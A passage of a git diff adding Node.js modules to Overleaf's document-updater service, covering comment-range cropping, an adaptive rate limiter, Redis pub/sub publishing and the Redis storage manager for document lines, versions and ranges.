+    historyOp.hpos = hpos
+  }
+  if (hlen !== op.c.length) {
+    historyOp.hlen = hlen
+  }
+  return historyOp
+}
+
+/**
+ * Return the ops necessary to properly crop comments when a tracked delete is
+ * received
+ *
+ * The editor treats a tracked delete as a proper delete and updates the
+ * comment range accordingly. The history doesn't do that and remembers the
+ * extent of the comment in the tracked delete. In order to keep the history
+ * consistent with the editor, we'll send ops that will crop the comment in
+ * the history.
+ *
+ * @param {DeleteOp} op
+ * @param {Comment[]} comments
+ * @returns {CommentOp[]}
+ */
+function getCroppedCommentOps(op, comments) {
+  const deleteStart = op.p
+  const deleteLength = op.d.length
+  const deleteEnd = deleteStart + deleteLength
+
+  /** @type {HistoryCommentOp[]} */
+  const historyCommentOps = []
+  for (const comment of comments) {
+    const commentStart = comment.op.p
+    const commentLength = comment.op.c.length
+    const commentEnd = commentStart + commentLength
+
+    if (deleteStart <= commentStart && deleteEnd > commentStart) {
+      // The delete overlaps the start of the comment or all of it.
+      const overlapLength = Math.min(deleteEnd, commentEnd) - commentStart
+
+      /** @type {CommentOp} */
+      const commentOp = {
+        p: deleteStart,
+        c: comment.op.c.slice(overlapLength),
+        t: comment.op.t,
+      }
+      if (comment.op.resolved) {
+        commentOp.resolved = true
+      }
+
+      historyCommentOps.push(commentOp)
+    } else if (
+      deleteStart > commentStart &&
+      deleteStart < commentEnd &&
+      deleteEnd >= commentEnd
+    ) {
+      // The delete overlaps the end of the comment.
+      const overlapLength = commentEnd - deleteStart
+
+      /** @type {CommentOp} */
+      const commentOp = {
+        p: commentStart,
+        c: comment.op.c.slice(0, -overlapLength),
+        t: comment.op.t,
+      }
+      if (comment.op.resolved) {
+        commentOp.resolved = true
+      }
+
+      historyCommentOps.push(commentOp)
+    }
+  }
+
+  return historyCommentOps
+}
+
+module.exports = RangesManager
diff --git a/services/document-updater/app/js/RateLimitManager.js b/services/document-updater/app/js/RateLimitManager.js
new file mode 100644
index 0000000..6e10f26
--- /dev/null
+++ b/services/document-updater/app/js/RateLimitManager.js
@@ -0,0 +1,85 @@
+/* eslint-disable
+    no-unused-vars,
+*/
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
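A worked trace of getCroppedCommentOps above, with hypothetical offsets: a ten character tracked delete at position 5 overlaps the first half of a comment spanning positions 10 to 20, so the cropped comment keeps only the surviving tail, repositioned at the delete:

// op      = { p: 5, d: 'xxxxxxxxxx' }  -> deleteStart 5, deleteEnd 15
// comment = { op: { p: 10, c: '0123456789', t: 'c1' } }  -> commentEnd 20
// first branch taken: 5 <= 10 && 15 > 10
// overlapLength = Math.min(15, 20) - 10 = 5
// result  = [{ p: 5, c: '56789', t: 'c1' }]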
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let RateLimiter +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const Metrics = require('./Metrics') + +module.exports = RateLimiter = class RateLimiter { + constructor(number) { + if (number == null) { + number = 10 + } + this.ActiveWorkerCount = 0 + this.CurrentWorkerLimit = number + this.BaseWorkerCount = number + } + + _adjustLimitUp() { + this.CurrentWorkerLimit += 0.1 // allow target worker limit to increase gradually + return Metrics.gauge('currentLimit', Math.ceil(this.CurrentWorkerLimit)) + } + + _adjustLimitDown() { + this.CurrentWorkerLimit = Math.max( + this.BaseWorkerCount, + this.CurrentWorkerLimit * 0.9 + ) + logger.debug( + { currentLimit: Math.ceil(this.CurrentWorkerLimit) }, + 'reducing rate limit' + ) + return Metrics.gauge('currentLimit', Math.ceil(this.CurrentWorkerLimit)) + } + + _trackAndRun(task, callback) { + if (callback == null) { + callback = function () {} + } + this.ActiveWorkerCount++ + Metrics.gauge('processingUpdates', this.ActiveWorkerCount) + return task(err => { + this.ActiveWorkerCount-- + Metrics.gauge('processingUpdates', this.ActiveWorkerCount) + return callback(err) + }) + } + + run(task, callback) { + if (this.ActiveWorkerCount < this.CurrentWorkerLimit) { + // below the limit, just put the task in the background + this._trackAndRun(task, err => { + if (err) { + logger.error({ err }, 'error in background task') + } + }) + callback() // return immediately + if (this.CurrentWorkerLimit > this.BaseWorkerCount) { + return this._adjustLimitDown() + } + } else { + logger.debug( + { + active: this.ActiveWorkerCount, + currentLimit: Math.ceil(this.CurrentWorkerLimit), + }, + 'hit rate limit' + ) + return this._trackAndRun(task, err => { + if (err == null) { + this._adjustLimitUp() + } // don't increment rate limit if there was an error + return callback(err) + }) // only return after task completes + } + } +} diff --git a/services/document-updater/app/js/RealTimeRedisManager.js b/services/document-updater/app/js/RealTimeRedisManager.js new file mode 100644 index 0000000..08bf132 --- /dev/null +++ b/services/document-updater/app/js/RealTimeRedisManager.js @@ -0,0 +1,136 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
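A usage sketch for the RateLimiter above (the task is hypothetical). While under the limit the task is run in the background and the callback fires immediately; once over the limit the callback is deferred until the task completes, which throttles the caller:

const RateLimiter = require('./RateLimitManager')

const limiter = new RateLimiter(10) // base limit of ten concurrent workers
limiter.run(
  done => setTimeout(done, 100), // the task signals completion via done(err)
  err => {
    if (err) console.error('task failed', err)
  }
)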
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const Settings = require('@overleaf/settings') +const { promisifyAll } = require('@overleaf/promise-utils') +const rclient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.documentupdater +) +const pubsubClient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.pubsub +) +const Keys = Settings.redis.documentupdater.key_schema +const logger = require('@overleaf/logger') +const os = require('node:os') +const crypto = require('node:crypto') +const metrics = require('./Metrics') + +const HOST = os.hostname() +const RND = crypto.randomBytes(4).toString('hex') // generate a random key for this process +let COUNT = 0 + +const MAX_OPS_PER_ITERATION = 8 // process a limited number of ops for safety + +const RealTimeRedisManager = { + getPendingUpdatesForDoc(docId, callback) { + // Make sure that this MULTI operation only operates on doc + // specific keys, i.e. keys that have the doc id in curly braces. + // The curly braces identify a hash key for Redis and ensures that + // the MULTI's operations are all done on the same node in a + // cluster environment. + const multi = rclient.multi() + multi.llen(Keys.pendingUpdates({ doc_id: docId })) + multi.lrange( + Keys.pendingUpdates({ doc_id: docId }), + 0, + MAX_OPS_PER_ITERATION - 1 + ) + multi.ltrim( + Keys.pendingUpdates({ doc_id: docId }), + MAX_OPS_PER_ITERATION, + -1 + ) + return multi.exec(function (error, replys) { + if (error != null) { + return callback(error) + } + const [llen, jsonUpdates, _trimResult] = replys + metrics.histogram( + 'redis.pendingUpdates.llen', + llen, + [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 15, 20, 25, 50, 75, 100] + ) + for (const jsonUpdate of jsonUpdates) { + // record metric for each update removed from queue + metrics.summary('redis.pendingUpdates', jsonUpdate.length, { + status: 'pop', + }) + } + const updates = [] + for (const jsonUpdate of jsonUpdates) { + let update + try { + update = JSON.parse(jsonUpdate) + } catch (e) { + return callback(e) + } + updates.push(update) + } + return callback(error, updates) + }) + }, + + getUpdatesLength(docId, callback) { + return rclient.llen(Keys.pendingUpdates({ doc_id: docId }), callback) + }, + + sendCanaryAppliedOp({ projectId, docId, op }) { + const ack = JSON.stringify({ v: op.v, doc: docId }).length + // Updates with op.dup===true will not get sent to other clients, they only get acked. + const broadcast = op.dup ? 0 : JSON.stringify(op).length + + const payload = JSON.stringify({ + message: 'canary-applied-op', + payload: { + ack, + broadcast, + docId, + projectId, + source: op.meta.source, + }, + }) + + // Publish on the editor-events channel of the project as real-time already listens to that before completing the connection startup. + + // publish on separate channels for individual projects and docs when + // configured (needs realtime to be configured for this too). 
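The branch below chooses the pub/sub channel. With per-project channels enabled, real-time subscribes to a project-specific channel name; otherwise every project shares one channel (the channel names are the ones used in this function, the project id is hypothetical):

// publishOnIndividualChannels enabled:
//   PUBLISH editor-events:641f0000000000000000abcd <payload>
// disabled:
//   PUBLISH editor-events <payload>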
+ if (Settings.publishOnIndividualChannels) { + return pubsubClient.publish(`editor-events:${projectId}`, payload) + } else { + return pubsubClient.publish('editor-events', payload) + } + }, + + sendData(data) { + // create a unique message id using a counter + const messageId = `doc:${HOST}:${RND}-${COUNT++}` + if (data != null) { + data._id = messageId + } + + const blob = JSON.stringify(data) + metrics.summary('redis.publish.applied-ops', blob.length) + + // publish on separate channels for individual projects and docs when + // configured (needs realtime to be configured for this too). + if (Settings.publishOnIndividualChannels) { + return pubsubClient.publish(`applied-ops:${data.doc_id}`, blob) + } else { + return pubsubClient.publish('applied-ops', blob) + } + }, +} + +module.exports = RealTimeRedisManager +module.exports.promises = promisifyAll(RealTimeRedisManager, { + without: ['sendData'], +}) diff --git a/services/document-updater/app/js/RedisManager.js b/services/document-updater/app/js/RedisManager.js new file mode 100644 index 0000000..f8e97f3 --- /dev/null +++ b/services/document-updater/app/js/RedisManager.js @@ -0,0 +1,796 @@ +const Settings = require('@overleaf/settings') +const rclient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.documentupdater +) +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const { promisifyAll } = require('@overleaf/promise-utils') +const metrics = require('./Metrics') +const Errors = require('./Errors') +const crypto = require('node:crypto') +const async = require('async') +const { docIsTooLarge } = require('./Limits') + +// Sometimes Redis calls take an unexpectedly long time. We have to be +// quick with Redis calls because we're holding a lock that expires +// after 30 seconds. We can't let any errors in the rest of the stack +// hold us up, and need to bail out quickly if there is a problem. +const MAX_REDIS_REQUEST_LENGTH = 5000 // 5 seconds +const PROJECT_BLOCK_TTL_SECS = 30 + +// Make times easy to read +const minutes = 60 // seconds for Redis expire + +const logHashReadErrors = Settings.documentupdater?.logHashErrors?.read + +const MEGABYTES = 1024 * 1024 +const MAX_RANGES_SIZE = 3 * MEGABYTES + +const keys = Settings.redis.documentupdater.key_schema + +const RedisManager = { + rclient, + + putDocInMemory( + projectId, + docId, + docLines, + version, + ranges, + resolvedCommentIds, + pathname, + projectHistoryId, + historyRangesSupport, + _callback + ) { + const timer = new metrics.Timer('redis.put-doc') + const callback = error => { + timer.done() + _callback(error) + } + const docLinesArray = docLines + docLines = JSON.stringify(docLines) + if (docLines.indexOf('\u0000') !== -1) { + const error = new Error('null bytes found in doc lines') + // this check was added to catch memory corruption in JSON.stringify. + // It sometimes returned null bytes at the end of the string. 
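A small illustration of the guard here; the corrupted value is synthetic, since a healthy JSON.stringify result never contains a null byte:

JSON.stringify(['abc']).indexOf('\u0000') // => -1, passes the check
'["abc"]\u0000'.indexOf('\u0000') // => 7, would trigger the error path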
logger.error({ err: error, docId, docLines }, error.message)
+      return callback(error)
+    }
+    // Do an optimised size check on the docLines using the serialised
+    // length as an upper bound
+    const sizeBound = docLines.length
+    if (docIsTooLarge(sizeBound, docLinesArray, Settings.max_doc_length)) {
+      const docSize = docLines.length
+      const err = new Error('blocking doc insert into redis: doc is too large')
+      logger.error({ projectId, docId, err, docSize }, err.message)
+      return callback(err)
+    }
+    const docHash = RedisManager._computeHash(docLines)
+    // record bytes sent to redis
+    metrics.summary('redis.docLines', docLines.length, { status: 'set' })
+    logger.debug(
+      { projectId, docId, version, docHash, pathname, projectHistoryId },
+      'putting doc in redis'
+    )
+    RedisManager._serializeRanges(ranges, (error, ranges) => {
+      if (error) {
+        logger.error({ err: error, docId, projectId }, error.message)
+        return callback(error)
+      }
+
+      // update docsInProject set before writing doc contents
+      const multi = rclient.multi()
+      multi.exists(keys.projectBlock({ project_id: projectId }))
+      multi.sadd(keys.docsInProject({ project_id: projectId }), docId)
+      multi.exec((err, reply) => {
+        if (err) {
+          return callback(err)
+        }
+        const projectBlocked = reply[0] === 1
+        if (projectBlocked) {
+          // We don't clean up the spurious docId added in the docsInProject
+          // set. There is a risk that the docId was successfully added by a
+          // concurrent process. This set is used when unloading projects. An
+          // extra docId will not prevent the project from being unloaded, but
+          // a missing docId means that the doc might stay in Redis forever.
+          return callback(
+            new OError('Project blocked from loading docs', { projectId })
+          )
+        }
+
+        RedisManager.setHistoryRangesSupportFlag(
+          docId,
+          historyRangesSupport,
+          err => {
+            if (err) {
+              return callback(err)
+            }
+
+            if (!pathname) {
+              metrics.inc('pathname', 1, {
+                path: 'RedisManager.setDoc',
+                status: pathname === '' ? 'zero-length' : 'undefined',
+              })
+            }
+
+            // Make sure that this MULTI operation only operates on doc
+            // specific keys, i.e. keys that have the doc id in curly braces.
+            // The curly braces identify a hash key for Redis and ensures that
+            // the MULTI's operations are all done on the same node in a
+            // cluster environment.
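How the curly-brace hash tags described above keep a MULTI on one node: Redis Cluster hashes only the text inside {...} when assigning a key to a slot, so every key for the same doc lands in the same slot (the key names below are illustrative; the real ones come from the key_schema settings):

// docLines:{641f...}, DocVersion:{641f...}, Ranges:{641f...}
// all three hash the same tag, map to one slot on one node,
// and so the MULTI ... EXEC that writes them executes atomically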
+ const multi = rclient.multi() + multi.mset({ + [keys.docLines({ doc_id: docId })]: docLines, + [keys.projectKey({ doc_id: docId })]: projectId, + [keys.docVersion({ doc_id: docId })]: version, + [keys.docHash({ doc_id: docId })]: docHash, + [keys.ranges({ doc_id: docId })]: ranges, + [keys.pathname({ doc_id: docId })]: pathname, + [keys.projectHistoryId({ doc_id: docId })]: projectHistoryId, + }) + if (historyRangesSupport) { + multi.del(keys.resolvedCommentIds({ doc_id: docId })) + if (resolvedCommentIds.length > 0) { + multi.sadd( + keys.resolvedCommentIds({ doc_id: docId }), + ...resolvedCommentIds + ) + } + } + multi.exec(err => { + if (err) { + callback( + OError.tag(err, 'failed to write doc to Redis in MULTI', { + previousErrors: err.previousErrors.map(e => ({ + name: e.name, + message: e.message, + command: e.command, + })), + }) + ) + } else { + callback() + } + }) + } + ) + }) + }) + }, + + removeDocFromMemory(projectId, docId, _callback) { + logger.debug({ projectId, docId }, 'removing doc from redis') + const callback = err => { + if (err) { + logger.err({ projectId, docId, err }, 'error removing doc from redis') + _callback(err) + } else { + logger.debug({ projectId, docId }, 'removed doc from redis') + _callback() + } + } + + // Make sure that this MULTI operation only operates on doc + // specific keys, i.e. keys that have the doc id in curly braces. + // The curly braces identify a hash key for Redis and ensures that + // the MULTI's operations are all done on the same node in a + // cluster environment. + let multi = rclient.multi() + multi.strlen(keys.docLines({ doc_id: docId })) + multi.del( + keys.docLines({ doc_id: docId }), + keys.projectKey({ doc_id: docId }), + keys.docVersion({ doc_id: docId }), + keys.docHash({ doc_id: docId }), + keys.ranges({ doc_id: docId }), + keys.pathname({ doc_id: docId }), + keys.projectHistoryId({ doc_id: docId }), + keys.unflushedTime({ doc_id: docId }), + keys.lastUpdatedAt({ doc_id: docId }), + keys.lastUpdatedBy({ doc_id: docId }), + keys.resolvedCommentIds({ doc_id: docId }) + ) + multi.exec((error, response) => { + if (error) { + return callback(error) + } + const length = response?.[0] + if (length > 0) { + // record bytes freed in redis + metrics.summary('redis.docLines', length, { status: 'del' }) + } + + // Make sure that this MULTI operation only operates on project + // specific keys, i.e. keys that have the project id in curly braces. + // The curly braces identify a hash key for Redis and ensures that + // the MULTI's operations are all done on the same node in a + // cluster environment. + multi = rclient.multi() + multi.srem(keys.docsInProject({ project_id: projectId }), docId) + multi.del(keys.projectState({ project_id: projectId })) + multi.exec(err => { + if (err) { + return callback(err) + } + rclient.srem(keys.historyRangesSupport(), docId, callback) + }) + }) + }, + + checkOrSetProjectState(projectId, newState, callback) { + // Make sure that this MULTI operation only operates on project + // specific keys, i.e. keys that have the project id in curly braces. + // The curly braces identify a hash key for Redis and ensures that + // the MULTI's operations are all done on the same node in a + // cluster environment. 
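checkOrSetProjectState below leans on GETSET returning the previous value while storing the new one, so a single round trip both updates the state hash and reveals whether it changed. A worked trace with hypothetical hashes:

// stored state | new state | GETSET returns | callback gets
// (unset)      | 'abc'     | null           | true  (treated as changed)
// 'abc'        | 'abc'     | 'abc'          | false (structure unchanged)
// 'abc'        | 'def'     | 'abc'          | true  (structure changed)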
+ const multi = rclient.multi() + multi.getset(keys.projectState({ project_id: projectId }), newState) + multi.expire(keys.projectState({ project_id: projectId }), 30 * minutes) + multi.exec((error, response) => { + if (error) { + return callback(error) + } + logger.debug( + { projectId, newState, oldState: response[0] }, + 'checking project state' + ) + callback(null, response[0] !== newState) + }) + }, + + clearProjectState(projectId, callback) { + rclient.del(keys.projectState({ project_id: projectId }), callback) + }, + + getDoc(projectId, docId, callback) { + const timer = new metrics.Timer('redis.get-doc') + const collectKeys = [ + keys.docLines({ doc_id: docId }), + keys.docVersion({ doc_id: docId }), + keys.docHash({ doc_id: docId }), + keys.projectKey({ doc_id: docId }), + keys.ranges({ doc_id: docId }), + keys.pathname({ doc_id: docId }), + keys.projectHistoryId({ doc_id: docId }), + keys.unflushedTime({ doc_id: docId }), + keys.lastUpdatedAt({ doc_id: docId }), + keys.lastUpdatedBy({ doc_id: docId }), + ] + rclient.mget(...collectKeys, (error, result) => { + if (error) { + return callback(error) + } + let [ + docLines, + version, + storedHash, + docProjectId, + ranges, + pathname, + projectHistoryId, + unflushedTime, + lastUpdatedAt, + lastUpdatedBy, + ] = result + rclient.sismember(keys.historyRangesSupport(), docId, (error, result) => { + if (error) { + return callback(error) + } + rclient.smembers( + keys.resolvedCommentIds({ doc_id: docId }), + (error, resolvedCommentIds) => { + if (error) { + return callback(error) + } + + const historyRangesSupport = result === 1 + + const timeSpan = timer.done() + // check if request took too long and bail out. only do this for + // get, because it is the first call in each update, so if this + // passes we'll assume others have a reasonable chance to succeed. + if (timeSpan > MAX_REDIS_REQUEST_LENGTH) { + error = new Error('redis getDoc exceeded timeout') + return callback(error) + } + // record bytes loaded from redis + if (docLines != null) { + metrics.summary('redis.docLines', docLines.length, { + status: 'get', + }) + } + // check sha1 hash value if present + if (docLines != null && storedHash != null) { + const computedHash = RedisManager._computeHash(docLines) + if (logHashReadErrors && computedHash !== storedHash) { + logger.error( + { + projectId, + docId, + docProjectId, + computedHash, + storedHash, + docLines, + }, + 'hash mismatch on retrieved document' + ) + } + } + + try { + docLines = JSON.parse(docLines) + ranges = RedisManager._deserializeRanges(ranges) + } catch (e) { + return callback(e) + } + + version = parseInt(version || 0, 10) + // check doc is in requested project + if (docProjectId != null && docProjectId !== projectId) { + logger.error( + { projectId, docId, docProjectId }, + 'doc not in project' + ) + return callback(new Errors.NotFoundError('document not found')) + } + + if (docLines && version && !pathname) { + metrics.inc('pathname', 1, { + path: 'RedisManager.getDoc', + status: pathname === '' ? 
'zero-length' : 'undefined', + }) + } + + callback( + null, + docLines, + version, + ranges, + pathname, + projectHistoryId, + unflushedTime, + lastUpdatedAt, + lastUpdatedBy, + historyRangesSupport, + resolvedCommentIds + ) + } + ) + }) + }) + }, + + getDocVersion(docId, callback) { + rclient.mget(keys.docVersion({ doc_id: docId }), (error, result) => { + if (error) { + return callback(error) + } + let [version] = result || [] + version = parseInt(version, 10) + callback(null, version) + }) + }, + + getDocLines(docId, callback) { + rclient.get(keys.docLines({ doc_id: docId }), (error, docLines) => { + if (error) { + return callback(error) + } + callback(null, docLines) + }) + }, + + getPreviousDocOps(docId, start, end, callback) { + const timer = new metrics.Timer('redis.get-prev-docops') + rclient.llen(keys.docOps({ doc_id: docId }), (error, length) => { + if (error) { + return callback(error) + } + rclient.get(keys.docVersion({ doc_id: docId }), (error, version) => { + if (error) { + return callback(error) + } + version = parseInt(version, 10) + const firstVersionInRedis = version - length + + if (start < firstVersionInRedis || end > version) { + error = new Errors.OpRangeNotAvailableError( + 'doc ops range is not loaded in redis', + { firstVersionInRedis, version, ttlInS: RedisManager.DOC_OPS_TTL } + ) + logger.debug( + { err: error, docId, length, version, start, end }, + 'doc ops range is not loaded in redis' + ) + return callback(error) + } + + start = start - firstVersionInRedis + if (end > -1) { + end = end - firstVersionInRedis + } + + if (isNaN(start) || isNaN(end)) { + error = new Error('inconsistent version or lengths') + logger.error( + { err: error, docId, length, version, start, end }, + 'inconsistent version or length' + ) + return callback(error) + } + + rclient.lrange( + keys.docOps({ doc_id: docId }), + start, + end, + (error, jsonOps) => { + let ops + if (error) { + return callback(error) + } + try { + ops = jsonOps.map(jsonOp => JSON.parse(jsonOp)) + } catch (e) { + return callback(e) + } + const timeSpan = timer.done() + if (timeSpan > MAX_REDIS_REQUEST_LENGTH) { + error = new Error('redis getPreviousDocOps exceeded timeout') + return callback(error) + } + callback(null, ops) + } + ) + }) + }) + }, + + DOC_OPS_TTL: 60 * minutes, + DOC_OPS_MAX_LENGTH: 100, + updateDocument( + projectId, + docId, + docLines, + newVersion, + appliedOps, + ranges, + updateMeta, + callback + ) { + if (appliedOps == null) { + appliedOps = [] + } + RedisManager.getDocVersion(docId, (error, currentVersion) => { + if (error) { + return callback(error) + } + if (currentVersion + appliedOps.length !== newVersion) { + error = new Error(`Version mismatch. 
'${docId}' is corrupted.`) + logger.error( + { + err: error, + docId, + currentVersion, + newVersion, + opsLength: appliedOps.length, + }, + 'version mismatch' + ) + return callback(error) + } + + const jsonOps = appliedOps.map(op => JSON.stringify(op)) + for (const op of jsonOps) { + if (op.indexOf('\u0000') !== -1) { + error = new Error('null bytes found in jsonOps') + // this check was added to catch memory corruption in JSON.stringify + logger.error({ err: error, docId, jsonOps }, error.message) + return callback(error) + } + } + + const newDocLines = JSON.stringify(docLines) + if (newDocLines.indexOf('\u0000') !== -1) { + error = new Error('null bytes found in doc lines') + // this check was added to catch memory corruption in JSON.stringify + logger.error({ err: error, docId, newDocLines }, error.message) + return callback(error) + } + // Do an optimised size check on the docLines using the serialised + // length as an upper bound + const sizeBound = newDocLines.length + if (docIsTooLarge(sizeBound, docLines, Settings.max_doc_length)) { + const err = new Error('blocking doc update: doc is too large') + const docSize = newDocLines.length + logger.error({ projectId, docId, err, docSize }, err.message) + return callback(err) + } + const newHash = RedisManager._computeHash(newDocLines) + + const opVersions = appliedOps.map(op => op?.v) + logger.debug( + { + docId, + version: newVersion, + hash: newHash, + opVersions, + }, + 'updating doc in redis' + ) + // record bytes sent to redis in update + metrics.summary('redis.docLines', newDocLines.length, { + status: 'update', + }) + RedisManager._serializeRanges(ranges, (error, ranges) => { + if (error) { + logger.error({ err: error, docId }, error.message) + return callback(error) + } + if (ranges && ranges.indexOf('\u0000') !== -1) { + error = new Error('null bytes found in ranges') + // this check was added to catch memory corruption in JSON.stringify + logger.error({ err: error, docId, ranges }, error.message) + return callback(error) + } + + // Make sure that this MULTI operation only operates on doc + // specific keys, i.e. keys that have the doc id in curly braces. + // The curly braces identify a hash key for Redis and ensures that + // the MULTI's operations are all done on the same node in a + // cluster environment. + const multi = rclient.multi() + multi.mset({ + [keys.docLines({ doc_id: docId })]: newDocLines, + [keys.docVersion({ doc_id: docId })]: newVersion, + [keys.docHash({ doc_id: docId })]: newHash, + [keys.ranges({ doc_id: docId })]: ranges, + [keys.lastUpdatedAt({ doc_id: docId })]: Date.now(), + [keys.lastUpdatedBy({ doc_id: docId })]: + updateMeta && updateMeta.user_id, + }) + multi.ltrim( + keys.docOps({ doc_id: docId }), + -RedisManager.DOC_OPS_MAX_LENGTH, + -1 + ) // index 3 + // push the ops last so we can get the lengths at fixed index position 7 + if (jsonOps.length > 0) { + multi.rpush(keys.docOps({ doc_id: docId }), ...jsonOps) // index 5 + // expire must come after rpush since before it will be a no-op if the list is empty + multi.expire(keys.docOps({ doc_id: docId }), RedisManager.DOC_OPS_TTL) // index 6 + } + // Set the unflushed timestamp to the current time if not set ("NX" flag). 
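+        // Illustrative consequence of NX (note added here, not in the
+        // original source): the first update after a flush stores
+        // Date.now(), and later updates leave that value untouched, so
+        // unflushedTime holds the timestamp of the oldest unflushed change
+        // for this doc.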
+ multi.set(keys.unflushedTime({ doc_id: docId }), Date.now(), 'NX') + multi.exec((error, result) => { + if (error) { + return callback(error) + } + callback() + }) + }) + }) + }, + + renameDoc(projectId, docId, userId, update, projectHistoryId, callback) { + RedisManager.getDoc(projectId, docId, (error, lines, version) => { + if (error) { + return callback(error) + } + if (lines != null && version != null) { + if (!update.newPathname) { + logger.warn( + { projectId, docId, update }, + 'missing pathname in RedisManager.renameDoc' + ) + metrics.inc('pathname', 1, { + path: 'RedisManager.renameDoc', + status: update.newPathname === '' ? 'zero-length' : 'undefined', + }) + } + rclient.set( + keys.pathname({ doc_id: docId }), + update.newPathname, + callback + ) + } else { + callback() + } + }) + }, + + clearUnflushedTime(docId, callback) { + rclient.del(keys.unflushedTime({ doc_id: docId }), callback) + }, + + updateCommentState(docId, commentId, resolved, callback) { + if (resolved) { + rclient.sadd( + keys.resolvedCommentIds({ doc_id: docId }), + commentId, + callback + ) + } else { + rclient.srem( + keys.resolvedCommentIds({ doc_id: docId }), + commentId, + callback + ) + } + }, + + getDocIdsInProject(projectId, callback) { + rclient.smembers(keys.docsInProject({ project_id: projectId }), callback) + }, + + /** + * Get lastupdatedat timestamps for an array of docIds + */ + getDocTimestamps(docIds, callback) { + async.mapSeries( + docIds, + (docId, cb) => rclient.get(keys.lastUpdatedAt({ doc_id: docId }), cb), + callback + ) + }, + + /** + * Store the project id in a sorted set ordered by time with a random offset + * to smooth out spikes + */ + queueFlushAndDeleteProject(projectId, callback) { + const SMOOTHING_OFFSET = + Settings.smoothingOffset > 0 + ? Math.round(Settings.smoothingOffset * Math.random()) + : 0 + rclient.zadd( + keys.flushAndDeleteQueue(), + Date.now() + SMOOTHING_OFFSET, + projectId, + callback + ) + }, + + /** + * Find the oldest queued flush that is before the cutoff time + */ + getNextProjectToFlushAndDelete(cutoffTime, callback) { + rclient.zrangebyscore( + keys.flushAndDeleteQueue(), + 0, + cutoffTime, + 'WITHSCORES', + 'LIMIT', + 0, + 1, + (err, reply) => { + if (err) { + return callback(err) + } + // return if no projects ready to be processed + if (!reply || reply.length === 0) { + return callback() + } + // pop the oldest entry (get and remove in a multi) + const multi = rclient.multi() + // Poor man's version of ZPOPMIN, which is only available in Redis 5. + multi.zrange(keys.flushAndDeleteQueue(), 0, 0, 'WITHSCORES') + multi.zremrangebyrank(keys.flushAndDeleteQueue(), 0, 0) + multi.zcard(keys.flushAndDeleteQueue()) // the total length of the queue (for metrics) + multi.exec((err, reply) => { + if (err) { + return callback(err) + } + if (!reply || reply.length === 0) { + return callback() + } + const [key, timestamp] = reply[0] + const queueLength = reply[2] + callback(null, key, timestamp, queueLength) + }) + } + ) + }, + + setHistoryRangesSupportFlag(docId, historyRangesSupport, callback) { + if (historyRangesSupport) { + rclient.sadd(keys.historyRangesSupport(), docId, callback) + } else { + rclient.srem(keys.historyRangesSupport(), docId, callback) + } + }, + + blockProject(projectId, callback) { + // Make sure that this MULTI operation only operates on project + // specific keys, i.e. keys that have the project id in curly braces. 
+ // The curly braces identify a hash key for Redis and ensures that + // the MULTI's operations are all done on the same node in a + // cluster environment. + const multi = rclient.multi() + multi.setex( + keys.projectBlock({ project_id: projectId }), + PROJECT_BLOCK_TTL_SECS, + '1' + ) + multi.scard(keys.docsInProject({ project_id: projectId })) + multi.exec((err, reply) => { + if (err) { + return callback(err) + } + const docsInProject = reply[1] + if (docsInProject > 0) { + // Too late to lock the project + rclient.del(keys.projectBlock({ project_id: projectId }), err => { + if (err) { + return callback(err) + } + callback(null, false) + }) + } else { + callback(null, true) + } + }) + }, + + unblockProject(projectId, callback) { + rclient.del(keys.projectBlock({ project_id: projectId }), (err, reply) => { + if (err) { + return callback(err) + } + const wasBlocked = reply === 1 + callback(null, wasBlocked) + }) + }, + + _serializeRanges(ranges, callback) { + let jsonRanges = JSON.stringify(ranges) + if (jsonRanges && jsonRanges.length > MAX_RANGES_SIZE) { + return callback(new Error('ranges are too large')) + } + if (jsonRanges === '{}') { + // Most doc will have empty ranges so don't fill redis with lots of '{}' keys + jsonRanges = null + } + callback(null, jsonRanges) + }, + + _deserializeRanges(ranges) { + if (ranges == null || ranges === '') { + return {} + } else { + return JSON.parse(ranges) + } + }, + + _computeHash(docLines) { + // use sha1 checksum of doclines to detect data corruption. + // + // note: must specify 'utf8' encoding explicitly, as the default is + // binary in node < v5 + return crypto.createHash('sha1').update(docLines, 'utf8').digest('hex') + }, +} + +module.exports = RedisManager +module.exports.promises = promisifyAll(RedisManager, { + without: ['_deserializeRanges', '_computeHash'], + multiResult: { + getDoc: [ + 'lines', + 'version', + 'ranges', + 'pathname', + 'projectHistoryId', + 'unflushedTime', + 'lastUpdatedAt', + 'lastUpdatedBy', + 'historyRangesSupport', + 'resolvedCommentIds', + ], + getNextProjectToFlushAndDelete: [ + 'projectId', + 'flushTimestamp', + 'queueLength', + ], + }, +}) diff --git a/services/document-updater/app/js/ShareJsDB.js b/services/document-updater/app/js/ShareJsDB.js new file mode 100644 index 0000000..5e9c517 --- /dev/null +++ b/services/document-updater/app/js/ShareJsDB.js @@ -0,0 +1,147 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
+/*
+ * decaffeinate suggestions:
+ * DS101: Remove unnecessary use of Array.from
+ * DS102: Remove unnecessary code created because of implicit returns
+ * DS207: Consider shorter variations of null checks
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+let ShareJsDB
+const logger = require('@overleaf/logger')
+const Metrics = require('@overleaf/metrics')
+const Keys = require('./UpdateKeys')
+const RedisManager = require('./RedisManager')
+const Errors = require('./Errors')
+
+const TRANSFORM_UPDATES_COUNT_BUCKETS = [
+  0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 15, 20, 25, 50, 75, 100,
+  // prepare buckets for full-project history/larger buffer experiments
